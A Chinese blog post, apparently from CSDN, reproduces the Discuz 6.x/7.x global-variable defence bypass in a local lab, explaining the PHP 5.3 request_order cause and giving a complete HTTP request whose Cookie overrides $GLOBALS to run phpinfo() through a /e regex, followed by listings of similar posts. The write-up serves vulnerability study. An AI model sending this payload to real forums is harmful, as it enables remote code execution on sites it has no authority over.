Discuz 7.x/6.x 全局变量防御绕过导致代码执行

于 2021-12-07 16:00:08 发布
阅读量1.1k 收藏
点赞数
分类专栏: 学海无涯 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/121771144
版权

由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。

具体原理请参考:

产品样子

 直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

发送数据包

GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1
Host: 192.168.1.53:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.53:8080/forumdisplay.php?fid=2
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Upgrade-Insecure-Requests: 1

 

时光凉春衫薄
关注
专栏目录
利用Vulnhub复现漏洞 - Discuz 7.x/6.x 全局变量防御绕过导致代码执行
JiangBuLiu的博客
06-28 928
Discuz 7.x/6.x 全局变量防御绕过导致代码执行Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过...
Discuz 7.x、6.x 全局变量防御绕过导致代码执行
浅笑996的博客
11-25 1186
0x01 分析 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 具体原理请参考: https://www.secpulse.com/archives/2338.html 0x02 环境...
Discuz 7.x/6.x 代码执行
haha1314的博客
08-10 491
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 漏洞复现 安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][sm...
全局变量防御绕过漏洞演示
Chenamao的博客
08-09 500
目录 全局变量防御绕过漏洞演示 漏洞环境搭建Vulhub Docker简介: 搭建步骤: 让我们漏洞复现一下子: 全局变量防御绕过漏洞演示 漏洞环境搭建Vulhub 一款基于docker和docker-compose的漏洞环境部署平台。 vulhub官网地址:https://vulhub.org Docker简介: 是一个开源的应用容器引擎,基于Go语言并遵从Apache2.0协议开源。 可以让开发者打包到他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的Linu
SERVER全局变量绕过
最新发布
09-03
6.x/7.x 全局变量防御绕过导致命令执行](https://blog.csdn.net/weixin_42361708/article/details/115651776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
Discuz 7.x6.x 全局变量防御绕过导致代码执行(wooyun-2010-080723)
黑白的博客
12-06 569
声明 好好学习,天天向上 漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 影响范围 6.x 7.x 复现过程 使用vulhub 这里使用7.2版本 cd /app/vulhub-master/discuz/wooyun-2010-080723 启动 docker-compose
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
viewthread.php
10-18
介绍viewthread的,下了就知道了,打开有点困难。
绕过全局变量防御导致代码执行
weixin_55541277的博客
06-18 282
[wooyun-2010-080723] 绕过全局变量防御导致代码执行 文章旨在记录个人收获以及知识分享,十分欢迎各位大佬纠正和补充 1.漏洞介绍 如果已经开启了 regeister_globals 配置,且在php5.3.x版本中 request_order配置默认为GP,导致Discuz!7.x/6.x版本可以绕过全局变量防御 regeister_globals 决定是否将EGPCS(即 Environment,Get,Post,Cookie,Server )变量注册为全局变量 request_or
Discuz! 6.x/7.x 全局变量防御绕过导致命令执行
weixin_30794491的博客
07-08 346
漏洞概述: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞。 漏洞分析: include/global.func.php代码里: 1 2 3 4 5 6 7 8 9 10 11 12 13 function dadds...
Discuz 6.x 7.x 全局变量防御绕过导致代码执行漏洞复现(超级详细)
weixin_45819911的博客
07-15 798
Discuz 6.x 7.x 全局变量防御绕过导致代码执行漏洞复现 闲谈: 其实自己做个不少漏洞复现,但是一直没好意思发,后来我发现了,不发出来我写他干嘛?(反正也没人看) 0x00 漏洞概述: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 0x01 前置条件: php版本:php5.3.x
Discuz
xiwangyizhicunzai的博客
11-22 408
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 这是一个非常知名,历史漏洞也比较多的cms。 由于php5.3.x版本里php.ini的设置里request_order默认值为GP(只包含get和post,不包含cookie),导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 核心利用代码: include...
discuz viewthread.php,跪求viewthread.php原本资料
weixin_29092579的博客
03-17 3857
/*[Discuz!] (C)2001-2006 Comsenz Inc.This is NOT a freeware, use is subject to license terms$RCSfile: viewthread.php,v $$Revision: 1.26.2.2 $$Date: 2006/03/09 04:58:33 $*/define('CURSCRIPT', 'viewthre...
Discuz x3.x模板:迪恩教育培训课程V7 GBK安装教程
资源摘要信息:"Discuz x3.x模板 迪恩教育培训课程V7 GBK.zip" 知识点: 1. Discuz x3.x版本介绍:Discuz! x是一个免费的开源论坛程序,由康盛创想(Comsenz)公司开发。x代表“扩展”,强调的是可扩展性。Discuz! ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值